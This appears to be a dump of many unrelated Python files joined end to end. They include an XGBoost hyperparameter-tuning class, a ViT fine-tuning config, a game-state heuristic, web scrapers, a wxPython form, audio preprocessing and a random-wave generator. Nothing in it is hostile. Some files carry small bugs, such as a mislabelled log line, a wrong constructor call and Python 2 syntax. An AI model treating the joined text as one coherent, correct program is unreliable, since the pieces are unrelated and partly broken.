create_folder(os.path.join(self.path_model, "results")) def get_train_test_split( self, test_size: float = 0.2, random_state: float = None ) -> None: """ Get the train and test split of the features and target values Args: test_size (float, optional): [description]. 
Defaults to 0.2. random_state ([type], optional): [description]. Defaults to None. """ if not random_state: random_state = random.randint(0, 1000) self.X_train, self.X_test, self.y_train, self.y_test = train_test_split( self.X, self.y, random_state=random_state, test_size=test_size ) self.logger.info(f"self.X: {self.X.shape}") self.logger.info(f"self.y: {self.y.shape}") self.logger.info(f"self.X_train: {self.X_train.shape}") self.logger.info(f"self.y_train: {self.y_train.shape}") self.logger.info(f"self.X_test: {self.X_test.shape}") self.logger.info(f"self.y_test: {self.y_test.shape}") self.logger.info(f"test_size: {test_size}") self.logger.info(f"random_state: {test_size}") self.logger.info(f"column_names: {self.column_names}") def hyperparamter_tuning( self, param_distributions: dict, cv_settings: dict ) -> None: """ Execute a random grid search using the distribution of hyperparemeter values and CV values Args: param_distributions (dict): dictionary with distribution of values per hyperparameter cv_settings (dict): dictionary CV settings """ random_search = self.build_CV_search(param_distributions, cv_settings) random_search.fit(self.X_train, self.y_train) self.get_CV_results(random_search, sort_by="rank_test_score") self.best_estimator = random_search.best_estimator_ self.best_params = random_search.best_params_ self.save_parameters(param_distributions, "param_distributions") self.save_parameters(cv_settings, "cv_settings") def save_parameters(self, variable: dict, name: str) -> None: """ Save dictionary to json using the provided name """ with open(os.path.join(self.path_save, f"{name}.json"), "w") as fp: json.dump(variable, fp) def build_pipeline(self, estimator=None): """ Build the pipeline for processing the data before model training """ return Pipeline( steps=[ ("scale", StandardScaler(with_mean=True, with_std=True)), ("estimator", estimator), ] ) def build_CV_search( self, param_distributions: dict, param_cv: dict ) -> sklearn.model_selection.RandomizedSearchCV: """ Setup the random search cross validation object Args: param_distributions (dict): [description] param_cv (dict): [description] Returns: sklearn.RandomizedSearchCV: [description] """ random_search = RandomizedSearchCV( estimator=self.estimator, param_distributions=param_distributions, n_iter=param_cv["n_iter"], scoring=param_cv["scoring"], cv=param_cv["cv"], return_train_score=False, n_jobs=param_cv["n_jobs"], verbose=param_cv["verbose"], random_state=param_cv["random_state"], ) return random_search def get_CV_results( self, random_search: sklearn.model_selection.RandomizedSearchCV, sort_by: str, ascending: bool = True, n_rows: int = 1000, ) -> None: """ Extract the results from the random search Cross Validation Args: random_search (sklearn.model_selection.RandomizedSearchCV): DESCRIPTION. sort_by (str): DESCRIPTION. ascending (bool, optional): DESCRIPTION. Defaults to True. n_rows (int, optional): DESCRIPTION. Defaults to 1000. (TYPE): DESCRIPTION. Returns: None: DESCRIPTION. """ df_results = ( pd.DataFrame(random_search.cv_results_) .sort_values(by=sort_by, ascending=ascending) .head(n_rows) ) df_results.to_csv( os.path.join(self.path_save, "cv_results.csv"), index=False, sep=";", float_format="%.3f", ) self.logger.info(f"Training score: \n{random_search.best_score_:.2f}") self.logger.info(f"Best hyperparameters: \n{random_search.best_params_}") def full_data_training(self) -> None: """ Train the model on the the full dataset and on the best hyperparameters Returns: None: DESCRIPTION. 
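Note: assumes `hyperparamter_tuning` has already been run, since this method
relies on `self.best_params` to configure the estimator.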
""" self.final_model = self.estimator.set_params(**self.best_params) self.final_model.fit(self.X, self.y) def evaluate(self) -> None: """ Evaluate the model with the best performing hyperparamters, use the test set to the metrics for the model Returns: None: DESCRIPTION. """ self.y_pred = self.best_estimator.predict(self.X_test) if is_regressor(self.estimator): methods = [ r2_score, mean_absolute_error, mean_squared_error, mean_absolute_percentage_error, ] else: methods = [accuracy_score, precision_score, f1_score] results = {} for method in methods: score = method(self.y_test, self.y_pred) results[method.__name__] = score self.logger.info(f"{method.__name__}: {score:.2f}") pd.DataFrame(results, index=[self.time_stamp]).to_csv( os.path.join(self.path_save, "best_score.csv"), float_format="%.2f", sep=";" ) def save_pickle(self) -> None: """ save the estimator into a pickle file Returns: None: DESCRIPTION. """ name = f"{self.save_name}.pickle" with open(os.path.join(self.path_model, name), "wb") as handle: pickle.dump(self.final_model, handle, protocol=pickle.HIGHEST_PROTOCOL) self.logger.info(f"Save: {os.path.join(self.path_model, name)}") def load_pickle(self, name: str) -> None: """ Load the estimator from a pickle file Args: name (str): DESCRIPTION. Returns: None: DESCRIPTION. """ assert name.endswith(".pickle") with open(os.path.join(self.path_model, name), "rb") as handle: estimator = pickle.load(handle) self.logger.info(f"Load: {os.path.join(self.path_model, name)}") return estimator def visualize(self, image_name: str = "results.png"): """ plot the predictions versus the true values Args: image_name (str, optional): DESCRIPTION. Defaults to "results.png". Returns: None. """ fig = plt.figure(figsize=(4, 5)) # Plot Real vs Predict plt.scatter(self.y_pred, self.y_test, alpha=0.5) plt.xlabel("y_pred") plt.ylabel("y_test") plt.show(block=False) fig.savefig(os.path.join(self.path_save, image_name)) def save_config(self, config): """ save the configurations of the dataset Args: config (TYPE): DESCRIPTION. Returns: None. """ with open( os.path.join(self.path_save, "config.json"), "w", encoding="utf-8" ) as f: json.dump(config, f, ensure_ascii=False, indent=4) def train(self, param_distributions, cv_settings, config): """ wrapper function to execute the full training process end-to-end, including hyperparameter tuning, evaluation, visualization and model saving Args: param_distributions (TYPE): DESCRIPTION. cv_settings (TYPE): DESCRIPTION. config (TYPE): DESCRIPTION. Returns: None. 
""" self.hyperparamter_tuning(param_distributions, cv_settings) self.evaluate() self.visualize() self.full_data_training() self.save_pickle() self.save_config(config) param_distributions = { "learning_rate": [0.001, 0.01, 0.05, 0.1, 0.25, 0.5], "max_depth": [3, 5, 7, 9], "min_child_weight": [1, 3, 5, 10], "subsample": [0.5, 0.7, 0.8, 1.0], "colsample_bytree": [0.25, 0.5, 0.7, 1.0], "n_estimators": [100, 200], "objective": ["reg:squarederror"], } cv_settings = { "n_iter": 400, # total combinations testes "scoring": "r2", "cv": 4, "random_state": 0, "n_jobs": -1, "verbose": 3, } if __name__ == "__main__": path_load = os.path.join(path_base, r"dataset", "training") path_model = os.path.join(path_base, r"model") name = "training_data_v2.csv" source = "training" if source == "demo": diabetes = load_diabetes() X = diabetes.data y = diabetes.target elif source == "training": X, y = get_dataset( path_load=path_load, name=name, ) else: raise estimator = XGBRegressor() config = {"target": list(y)[0], "features": list(X)} model = ModelClass(estimator, X, y, path_model) model.train(param_distributions, cv_settings, config) Chace-wang/bk-nodemancommon/api/domains.py # -*- coding: utf-8 -*- """ TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-节点管理(BlueKing-BK-NODEMAN) available. Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import os from django.conf import settings ESB_PREFIX_V2 = os.getenv("ESB_PREFIX_V2") or "/api/c/compapi/v2/" def gen_api_root(api_gw_env_key: str, suffix: str) -> str: """生成API根路径,首先从环境变量获取,若环境变量没有,则按默认规则拼接""" api_gw_env_val = os.getenv(api_gw_env_key) if api_gw_env_val: return api_gw_env_val api_root = f"{settings.BK_COMPONENT_API_URL}/{ESB_PREFIX_V2}/{suffix}/" if api_root.startswith("http://"): api_root = api_root[:7] + api_root[7:].replace("//", "/") elif api_root.startswith("https://"): api_root = api_root[:8] + api_root[8:].replace("//", "/") else: api_root = api_root.replace("//", "/") return api_root # 蓝鲸平台模块域名 CC_APIGATEWAY_ROOT_V2 = gen_api_root("BKAPP_BK_CC_APIGATEWAY", "cc") GSE_APIGATEWAY_ROOT_V2 = gen_api_root("BKAPP_BK_GSE_APIGATEWAY", "gse") ESB_APIGATEWAY_ROOT_V2 = gen_api_root("BKAPP_BK_ESB_APIGATEWAY", "esb") JOB_APIGATEWAY_ROOT_V3 = gen_api_root("BKAPP_BK_JOB_APIGATEWAY", "jobv3") BK_NODE_APIGATEWAY_ROOT = gen_api_root("BKAPP_BK_NODE_APIGATEWAY", "nodeman") # coding=utf-8 # Copyright 2022 The Uncertainty Baselines Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
# pylint: disable=line-too-long r"""Finetune a ViT-L/32 heteroscedastic model on Imagenet. """ # pylint: enable=line-too-long import ml_collections import sweep_utils # local file import from baselines.jft.experiments def get_sweep(hyper): """Few-shot sweep.""" imagenet_1shot_sweep = hyper.product([ hyper.chainit([ hyper.product(sweep_utils.imagenet_fewshot( hyper, fewshot='1shot', steps=200, warmup=s)) for s in [1, 5, 10]]), hyper.sweep('config.lr.base', [0.04, 0.03, 0.02]), hyper.sweep('config.model.temperature', [0.25, 0.5, 0.75, 1.0, 2.0, 3.0]) ]) imagenet_5shot_sweep = hyper.product([ hyper.chainit([ hyper.product(sweep_utils.imagenet_fewshot( hyper, fewshot='5shot', steps=1000, warmup=s)) for s in [1, 10, 20, 30]]), hyper.sweep('config.lr.base', [0.05, 0.04, 0.03]), hyper.sweep('config.model.temperature', [0.25, 0.5, 0.75, 1.0, 2.0, 3.0]) ]) imagenet_10shot_sweep = hyper.product([ hyper.chainit([ hyper.product(sweep_utils.imagenet_fewshot( hyper, fewshot='10shot', steps=2000, warmup=s)) for s in [30, 40, 50]]), hyper.sweep('config.lr.base', [0.06, 0.05, 0.03]), hyper.sweep('config.model.temperature', [0.25, 0.5, 0.75, 1.0, 2.0, 3.0]) ]) return hyper.product([ hyper.chainit([ imagenet_1shot_sweep, imagenet_5shot_sweep, imagenet_10shot_sweep ]), ]) # def get_sweep(hyper): # return hyper.product([ # hyper.sweep('config.total_steps', [20_000, 30_000, 40_000]), # hyper.sweep('config.lr.base', [0.06, 0.03, 0.01]), # hyper.sweep('config.model.temperature', [0.15, 0.25, 0.5, 0.75]), # ]) def get_config(): """Config for training a patch-transformer on JFT.""" config = ml_collections.ConfigDict() # Fine-tuning dataset config.dataset = 'imagenet2012' config.train_split = 'train[:99%]' config.val_split = 'train[99%:]' config.test_split = 'validation' config.num_classes = 1000 # OOD eval # ood_split is the data split for both the ood_dataset and the dataset. config.ood_datasets = [] config.ood_num_classes = [] config.ood_split = '' config.ood_methods = [] config.pp_eval_ood = [] BATCH_SIZE = 512 # pylint: disable=invalid-name config.batch_size = BATCH_SIZE config.batch_size_eval = BATCH_SIZE config.val_cache = False config.total_steps = 40_000 INPUT_RES = 384 # pylint: disable=invalid-name common = '|value_range(-1, 1)' common += '|onehot(1000, key="label", key_result="labels")' common += '|keep(["image", "labels"])' pp_train = f'decode_jpeg_and_inception_crop({INPUT_RES})|flip_lr' config.pp_train = pp_train + common config.pp_eval = f'decode|resize({INPUT_RES})' + common # CIFAR-10H eval config.eval_on_cifar_10h = False config.pp_eval_cifar_10h = '' # Imagenet ReaL eval config.eval_on_imagenet_real = True config.pp_eval_imagenet_real = f'decode|resize({INPUT_RES})|value_range(-1, 1)|keep(["image", "labels"])' # pylint: disable=line-too-long config.shuffle_buffer_size = 50_000 # Per host, so small-ish is ok. config.log_training_steps = 2000 config.log_eval_steps = 5000 config.checkpoint_steps = 10000 config.checkpoint_timeout = 1 config.prefetch_to_device = 2 config.trial = 0 # Model section # pre-trained model ckpt file # !!! The below section should be modified per experiment config.model_init = '/path/to/pretrained_model_ckpt.npz' # Model definition to be copied from the pre-training config config.model = ml_collections.ConfigDict() config.model.patches = ml_collections.ConfigDict() config.model.patches.size = [32, 32] config.model.hidden_size = 1024 config.model.transformer = ml_collections.ConfigDict() config.model.transformer.attention_dropout_rate = 0. 
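# ViT-L/32 backbone dimensions: 24 transformer layers, 16 attention heads,
# hidden size 1024, MLP dim 4096 (see the surrounding assignments).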
config.model.transformer.dropout_rate = 0. config.model.transformer.mlp_dim = 4096 config.model.transformer.num_heads = 16 config.model.transformer.num_layers = 24 config.model.classifier = 'token' # Or 'gap' config.model.fix_base_model = False # This is "no head" fine-tuning, which we use by default config.model.representation_size = None # set reint_head = False to re-use the head parameters of the upstream model config.reint_head = True # Heteroscedastic config.model.multiclass = True config.model.temperature = 3.0 config.model.mc_samples = 5000 config.model.num_factors = 0 config.model.param_efficient = False config.model.return_locs = False # True -> fine-tune a homoscedastic model # Optimizer section config.optim_name = 'Momentum' config.optim = ml_collections.ConfigDict() config.grad_clip_norm = 1.0 config.weight_decay = None # No explicit weight decay config.loss = 'softmax_xent' # or 'sigmoid_xent' config.lr = ml_collections.ConfigDict() config.lr.base = 0.003 config.lr.warmup_steps = 500 config.lr.decay_type = 'cosine' return config 1-10 import numpy as np from gym_splendor_code.envs.mechanics.action_space_generator import generate_all_legal_actions from gym_splendor_code.envs.mechanics.game_settings import POINTS_TO_WIN from gym_splendor_code.envs.mechanics.state import State VALUE_IF_NO_LEGAL_ACTIONS = -1 class StateEvaluatorHeuristic: def __init__(self, weight: list = [100,2,2,1,0.1]): self.weight = weight self.normalize_weight() def normalize_weight(self): if np.linalg.norm(self.weight) > 0: self.weight = self.weight/np.linalg.norm(self.weight) def evaluate(self, state_to_eval): current_points = state_to_eval.active_players_hand().number_of_my_points() legal_actions = generate_all_legal_actions(state_to_eval) if len(legal_actions): points = [] for action in legal_actions: ae = action.evaluate(state_to_eval) potential_reward = (np.floor((current_points + ae["card"][2])/POINTS_TO_WIN) * self.weight[0] +\ self.weight[1] * ae["card"][2] + self.weight[2] *ae["nobles"] +\ self.weight[3] * ae["card"][0] + self.weight[4] * sum(ae["gems_flow"])) points.append(potential_reward) return max(points) else: return VALUE_IF_NO_LEGAL_ACTIONS#!/bin/env python3 # -*- coding: UTF-8 -*- ''' Created on 2016/09/03 @author: nkasai ''' import sys import argparse from abc import ABCMeta, abstractmethod from selenium import webdriver from pyquery import PyQuery as pq from selenium.webdriver.common.desired_capabilities import DesiredCapabilities # # settings # USER_AGNET = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36' class ScrapingBase(object, metaclass=ABCMeta): ''' ScrapingBase ''' def __init__(self, *args, **kwargs): ''' Constructor ''' self.url = kwargs['url'] print('url :{}'.format(self.url)) dcap = dict(DesiredCapabilities.PHANTOMJS) dcap['phantomjs.page.settings.userAgent'] = (USER_AGNET) self.browser = webdriver.PhantomJS(desired_capabilities=dcap) def get(self): """ get """ self.browser.get(self.url) source = self.browser.page_source.encode('utf-8') #print('source :{}'.format(source)) parsed = self._parse(source) #print('parsed :{}'.format(parsed)) obj = self._extract(parsed) #print('obj : {}'.format(obj)) self._register(obj) def _parse(self, source, *args, **kwargs): """ _parse """ return pq(source) @abstractmethod def _extract(self, parsed, *args, **kwargs): """ _extract """ ret = [] return ret @abstractmethod def _register(self, obj, *args, **kwargs): """ _register """ pass class MyScraping(ScrapingBase): ''' MyScraping ''' def 
_extract(self, parsed, *args, **kwargs): """ _extract """ ret = [] # # example # obj_emphasis = parsed('ul.emphasis') #print('obj_emphasis : {}'.format(obj_emphasis)) for o in obj_emphasis('li'): ret.append(pq(o).text()) #print('_extract() : {}'.format(ret)) return ret def _register(self, obj, *args, **kwargs): """ _register """ for o in obj: print(o) def main(args): """ main """ ret = 0 try: rc = MyScraping( url=args.url ) rc.get() except Exception as e: print(e.__class__.__name__) print(e) ret = 1 return ret if __name__ == '__main__': parser = argparse.ArgumentParser(description='scraping sample.') parser.add_argument('--url', required=True) args = parser.parse_args() result = main(args) sys.exit(result) def fourthPower(x): ''' x: int or float. ''' result = square(x) * square(x) return result # -*- coding: utf-8 -*- ########################################################################### ## Python code generated with wxFormBuilder (version Jun 17 2015) ## http://www.wxformbuilder.org/ ## ## PLEASE DO "NOT" EDIT THIS FILE! ########################################################################### import wx import wx.xrc ########################################################################### ## Class MyFrame1 ########################################################################### class MyFrame1 ( wx.Frame ): def __init__( self, parent ): wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = wx.EmptyString, pos = wx.DefaultPosition, size = wx.Size( 970,608 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) bSizer2 = wx.BoxSizer( wx.VERTICAL ) gbSizer2 = wx.GridBagSizer( 0, 0 ) gbSizer2.SetFlexibleDirection( wx.BOTH ) gbSizer2.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText3 = wx.StaticText( self, wx.ID_ANY, u"胆码十", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText3.Wrap( -1 ) self.m_staticText3.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_HIGHLIGHT ) ) gbSizer2.Add( self.m_staticText3, wx.GBPosition( 0, 0 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox15 = wx.CheckBox( self, wx.ID_ANY, u"0", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox15, wx.GBPosition( 0, 1 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox16 = wx.CheckBox( self, wx.ID_ANY, u"1", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox16, wx.GBPosition( 0, 2 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox17 = wx.CheckBox( self, wx.ID_ANY, u"2", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox17, wx.GBPosition( 0, 3 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox18 = wx.CheckBox( self, wx.ID_ANY, u"3", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox18, wx.GBPosition( 0, 4 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox19 = wx.CheckBox( self, wx.ID_ANY, u"4", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox19, wx.GBPosition( 0, 5 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox20 = wx.CheckBox( self, wx.ID_ANY, u"5", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox20, wx.GBPosition( 0, 6 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox21 = wx.CheckBox( self, wx.ID_ANY, u"6", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox21, wx.GBPosition( 0, 7 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox22 = wx.CheckBox( self, wx.ID_ANY, u"7", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox22, wx.GBPosition( 0, 8 ), wx.GBSpan( 1, 1 ), wx.ALL, 
5 ) self.m_checkBox23 = wx.CheckBox( self, wx.ID_ANY, u"8", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox23, wx.GBPosition( 0, 9 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_checkBox24 = wx.CheckBox( self, wx.ID_ANY, u"9", wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_checkBox24, wx.GBPosition( 0, 10 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) self.m_textCtrl1 = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) gbSizer2.Add( self.m_textCtrl1, wx.GBPosition( 0, 12 ), wx.GBSpan( 1, 1 ), wx.ALL, 5 ) bSizer2.Add( gbSizer2, 1, wx.EXPAND, 5 ) self.SetSizer( bSizer2 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.Bind( wx.EVT_CHECKBOX, self.OnChar) self.m_textCtrl1.Bind( wx.EVT_TEXT, self.OnText ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnChar( self, event ): print("dd") cb = event.GetEventObject() print (cb.GetLabel(),' is clicked',cb.GetValue()) event.Skip() def OnText( self, event ): cb = event.GetEventObject() print(self.m_textCtrl1.GetValue()) #SetValue(value) event.Skip() if __name__ == "__main__": app = wx.App() frame = MyFrame1(None) frame.Show() app.MainLoop() #使用wxPython获取系统剪贴板中的数据的教程 erow/disentanglement_lib from argparse import ArgumentParser import gin from pytorch_lightning.loggers.wandb import WandbLogger import wandb from disentanglement_lib.data.ground_truth.ground_truth_data import RandomAction from disentanglement_lib.data.ground_truth.named_data import get_named_ground_truth_data from disentanglement_lib.methods.shared.architectures import * from disentanglement_lib.methods.unsupervised import train from disentanglement_lib.methods.unsupervised import callbacks import os import pytorch_lightning as pl from disentanglement_lib.methods.unsupervised.model import Regularizer os.environ['WANDB_TAGS']='annealed_test' os.environ['WANDB_PROJECT']='IFP' @gin.configurable('annealed_test') class AnnealedTest(Regularizer): def __init__(self, gamma = 10, beta_max = 70, stage_steps=gin.REQUIRED): super().__init__() self.stage_steps = stage_steps self.gamma = gamma self.beta_max = beta_max def forward(self, data_batch, model, kl, z_mean, z_logvar, z_sampled): """Training compatible model function.""" global_step = model.global_step k = global_step/self.stage_steps beta = (np.exp(-self.gamma*k)*self.beta_max + 1) model.summary['beta'] = beta return beta * (kl.sum()) @gin.configurable('action') def get_action(dataset,index=gin.REQUIRED): return RandomAction(dataset,index) parser = ArgumentParser() parser.add_argument('--seed',type=int,default=99) parser.add_argument('--dataset',type=str,default='dsprites_full') parser.add_argument('--num_latent',type=int,default=1) parser.add_argument('-s', '--steps', type=int, default=8000) parser.add_argument('-g','--gamma',type=float,default=15) if __name__ == "__main__": args, unknown = parser.parse_known_args() if len(unknown)==0: seed= args.seed steps = args.steps gamma = args.gamma bindings= [ "model.regularizers = [@annealed_test()]", f"annealed_test.stage_steps={steps}", f"annealed_test.gamma={gamma}", f"model.seed={seed}", f"dataset.name='{args.dataset}'", f"model.num_latent={args.num_latent}" ] gin.parse_config(bindings) else: unknown = [i.strip('--') for i in unknown] + ["model.regularizers = [@annealed_test()]"] print(unknown) gin.parse_config(unknown) dataset = get_named_ground_truth_data() action = get_action(dataset) rs = np.random.RandomState(0) w,h,c = dataset.observation_shape pl_model = 
train.PLModel(input_shape=[c,w,h]) dl = torch.utils.data.DataLoader(train.Iterate(action), 64,num_workers=2,pin_memory=True) logger = WandbLogger() trainer = pl.Trainer( logger, # progress_bar_refresh_rate=500, # disable progress bar max_steps=steps, checkpoint_callback=False, callbacks=[ callbacks.EarlyStop(), callbacks.Visualization(2000), ], gpus=1,) trainer.fit(pl_model, dl) wandb.join() 0 # -*- coding: utf-8 -*- # # import os, sys # sys.path.insert(0, os.path.abspath(os.path.join('.', 'ext'))) import sphinx_rtd_theme extensions = ['sphinx.ext.todo', 'sphinx_rtd_theme', 'sphinx.ext.mathjax'] project = html_title = 'CARS Cloud Data' copyright = 'Public Domain' author = '' release = '1.0' html_short_title = 'millenia.cars.aps.anl.gov/cloud' pygments_style = 'sphinx' html_theme = 'sphinx_rtd_theme' templates_path = ['_templates'] source_suffix = '.rst' source_encoding = 'utf-8' master_doc = 'index' exclude_trees = ['_build'] add_function_parentheses = True add_module_names = False html_static_path = ['_static'] html_favicon = '_static/uchicago_logo.ico' language = None html_theme_options = { 'logo_only': False, 'display_version': False, 'prev_next_buttons_location': 'bottom', 'style_external_links': False, # True, # 'style_nav_header_background': 'white', # Toc options 'collapse_navigation': True, 'sticky_navigation': True, 'navigation_depth': 3, 'includehidden': True, 'titles_only': False } from src.models.sighting import Sighting import unittest import json import os class SightingModelTest(unittest.TestCase): """Sighting Model test cases.""" @classmethod def setupClass(cls): try: sighting = open(os.path.abspath(os.path.join(os.path.dirname(__file__), '../templates/models/sighting.json'))) cls.sighting = json.load(sighting) except NameError as e: raise Exception('No Sighting Model Class defined!') @classmethod def teardownClass(cls): pass def setUp(self): try: sighting = open(os.path.abspath(os.path.join(os.path.dirname(__file__), '../templates/models/sighting.json'))) self.sighting = json.load(sighting) except NameError as e: raise Exception('No Sighting Model Class defined!') def tearDown(self): pass # clean up def test_from_json(self): sighting = Sighting.from_json(self, self.sighting) self.assertIsInstance(sighting, Sighting) self.assertTrue(hasattr(sighting, "id")) self.assertEqual(sighting.id, 1) self.assertTrue(hasattr(sighting, "attribute_id")) self.assertEqual(sighting.attribute_id, 164373) self.assertTrue(hasattr(sighting, "event_id")) self.assertEqual(sighting.event_id, 625) self.assertTrue(hasattr(sighting, "org_id")) self.assertEqual(sighting.org_id, 1) self.assertTrue(hasattr(sighting, "date_sighting")) self.assertEqual(sighting.date_sighting, "1505767537") self.assertTrue(hasattr(sighting, "source")) self.assertEqual(sighting.source, "") self.assertTrue(hasattr(sighting, "uuid")) self.assertEqual(sighting.uuid, "59c03071-f480-4311-a710-03edc0a83832") def test_to_json(self): sighting = Sighting.from_json(self, self.sighting) self.assertDictEqual(sighting.to_json(), self.sighting) from scipy.io.wavfile import read import numpy as np import audio import soundfile as sf def _process_utterance(wav_path, hparams): try: # Load the audio as numpy array sr, wav = read(wav_path) wav = wav.astype(np.float32) MAX_WAV_VALUE = 32768.0 wav = wav / MAX_WAV_VALUE except FileNotFoundError: # catch missing wav exception print('file {} present in csv metadata is not present in wav folder. 
skipping!'.format( wav_path)) return None except Exception as e: wav, sr = sf.read(wav_path) D = audio._stft(wav, hparams) mel_spectrogram = audio._linear_to_mel(np.abs(D), hparams) if hparams.vocoder == 'waveglow': mel_spectrogram = audio.dynamic_range_compression(mel_spectrogram) else: mel_spectrogram = audio.amp_to_db(mel_spectrogram) mel_spectrogram = audio.normalize(mel_spectrogram, hparams) mel_spectrogram = (mel_spectrogram * 8.) - 4. mel_spectrogram = mel_spectrogram.astype(np.float32) mel_frames = mel_spectrogram.shape[1] constant_values = 0. if hparams.use_lws: # Ensure time resolution adjustement between audio and mel-spectrogram fft_size = hparams.n_fft if hparams.win_size is None else hparams.win_size l, r = audio.pad_lr(wav, fft_size, audio.get_hop_size(hparams)) # Zero pad audio signal out = np.pad(wav, (l, r), mode='constant', constant_values=constant_values) else: # Ensure time resolution adjustement between audio and mel-spectrogram l_pad, r_pad = audio.librosa_pad_lr(wav, hparams.n_fft, audio.get_hop_size(hparams), 1) # Reflect pad audio signal (Just like it's done in Librosa to avoid frame inconsistency) out = np.pad(wav, (l_pad, r_pad), mode='constant', constant_values=constant_values) assert len(out) >= mel_frames * audio.get_hop_size(hparams) # time resolution adjustement # ensure length of raw audio is multiple of hop size so that we can use # transposed convolution to upsample out = out[:mel_frames * audio.get_hop_size(hparams)] assert len(out) % audio.get_hop_size(hparams) == 0 return out, mel_spectrogram """ randomwave ======== Generates a random value between 0 and 1, of programmable period. Arguments:: { "period" : the period with which the random value is updated e.g. "PT1H" "lower" : (optional) numbers will be returned within range (lower,upper) - if not specified then range is (0.0, 1.0] "upper" : (optional) "precision" : (optional) 1 for integer, 10 for 1 decimal point, 100 for 2 decimals etc. } """ from .timefunction import Timefunction import isodate import math import random import logging # Because any time-function has to be able to generate the value of its waveform instantaneously for any moment # in time, we cannot iterate to produce randomness (e.g. LFSR). # And also, we have to base the random number off of time (so that if we want a period of e.g. 
1D then it only changes every 1D) class Randomwave(Timefunction): """Generates random waves of defined period""" def __init__(self, engine, device, params): self.engine = engine self.device = device self.period = float(isodate.parse_duration(params.get("period", "PT1H")).total_seconds()) self.lower = params.get("lower", 0.0) self.upper = params.get("upper", 1.0) self.precision = params.get("precision", None) self.initTime = engine.get_now() def state(self, t=None, t_relative=False): """Return a random wave""" if t is None: t = self.engine.get_now() if (not t_relative): t -= self.initTime r = random.Random() # Our own private random number generator quantised_time = int(t / self.period) r.seed(quantised_time + hash(self.device.get_property("$id"))) # Unique per device r.random() r.random() r.random() v = self.lower + r.random() * (self.upper-self.lower) if self.precision is not None: v = int(v * self.precision) / float(self.precision) return v def next_change(self, t=None): """Return a future time when the next event will happen""" if t is None: t = self.engine.get_now() t -= self.initTime p = float(self.period) t2 = math.floor(t / p) * p + p t2 += self.initTime return t2 def period(self): return float(self.period) # Check randomness class dummy_engine(): def get_now(self): return 0.0 if __name__ == "__main__": r = Randomwave(dummy_engine(), {"period" : "PT1S"}) for t in xrange(1000): print(r.state(t/10.0)) from __future__ import division #this will we used only in python 2 but by using this we get the float value import numpy as np print 5/2 1-10 import bs4 import click import requests from pymuseum.scrapers.base import AbstractScraper from pymuseum.scrapers import register_cmd class ArtUKscraper(AbstractScraper): def __init__(self, *args, **kwargs): self.url = "https://artuk.org/discover/artworks" super().__init__(*args, **kwargs) def get_image_path(self, **metadata): extension = metadata['url'].split('.')[-1] filename = metadata['title'] + ' - ' + metadata['artist'] + '.' + extension filename = self.sanitize_filename(filename) return str((self.save_path / filename).absolute()) def get_next_page_url(self): return self.url def get_images(self): entries = self.page.find_all('li', class_='item') for entry in entries: infos = entry.find_all('div', class_='info')[0] title = infos.find_all('div', class_="title")[0] artist = infos.find_all('div', class_="artist")[0] metadata = { 'artist': artist.text, 'title': title.text } entry_link = entry.a.attrs['href'] entry_page = requests.get(entry_link, headers=self.headers) if not entry_page.ok: continue entry_page = bs4.BeautifulSoup(entry_page.content, "lxml") link = entry_page.find_all('div', class_='artwork')[0].img.attrs['src'] metadata['url'] = link yield link, metadata @register_cmd @click.command('artuk') @click.pass_context def artuk_cmd(ctx): scraper = ArtUKscraper(save_path=ctx.obj['save_path'], dry_run=ctx.obj['dry_run']) scraper.scrap(ctx.obj['max_images']) validations/__init__.py ''' Input validations. 
